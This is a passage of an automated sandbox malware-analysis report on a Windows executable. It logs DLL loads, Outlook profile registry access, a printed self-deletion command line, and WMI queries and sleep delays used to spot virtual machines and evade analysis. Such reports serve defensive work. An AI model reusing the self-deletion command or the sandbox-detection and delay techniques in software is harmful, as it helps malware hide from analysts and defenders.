          Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: BA9qyj2c9G.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: BA9qyj2c9G.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: BA9qyj2c9G.exeStatic PE information: 0xE480C158 [Mon Jun 25 20:55:52 2091 UTC]
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 0_2_00007FFD9B724BBA pushad ; retf 0_2_00007FFD9B724BC9
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 0_2_00007FFD9B7200AD pushad ; iretd 0_2_00007FFD9B7200C1

          Hooking and other Techniques for Hiding and Protection

          barindex
          Self deletion via cmd or bat file
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\BA9qyj2c9G.exe"
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\BA9qyj2c9G.exe"Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeMemory allocated: 118532B0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeMemory allocated: 1186CB30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 599890Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 599672Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 599547Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 599437Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 599328Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 599218Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 599109Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 599000Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 598890Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 598778Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 598671Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 598562Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 598451Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 598341Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 598228Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 598099Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 597984Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 597875Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 597765Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 597656Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 597547Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 597437Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 597328Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 597218Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 597109Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 597000Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 596890Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 596781Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 596672Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 596562Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 596453Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 596344Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 596234Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 596125Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 596012Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 595906Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 595797Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 595687Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 595566Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeWindow / User API: threadDelayed 3334Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeWindow / User API: threadDelayed 6485Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -24903104499507879s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -599890s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -599781s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -599672s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -599547s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -599437s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -599328s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -599218s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -599109s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -599000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -598890s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -598778s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -598671s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -598562s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -598451s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -598341s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -598228s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -598099s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -597984s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -597875s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -597765s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -597656s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -597547s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -597437s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -597328s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -597218s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -597109s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -597000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -596890s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -596781s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -596672s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -596562s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -596453s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -596344s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -596234s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -596125s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -596012s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -595906s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -595797s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -595687s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448Thread sleep time: -595566s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 599890Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 599672Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 599547Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 599437Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 599328Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 599218Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 599109Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 599000Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 598890Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 598778Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 598671Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 598562Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 598451Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 598341Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 598228Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 598099Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 597984Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 597875Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 597765Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 597656Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 597547Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 597437Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 597328Jump to behavior
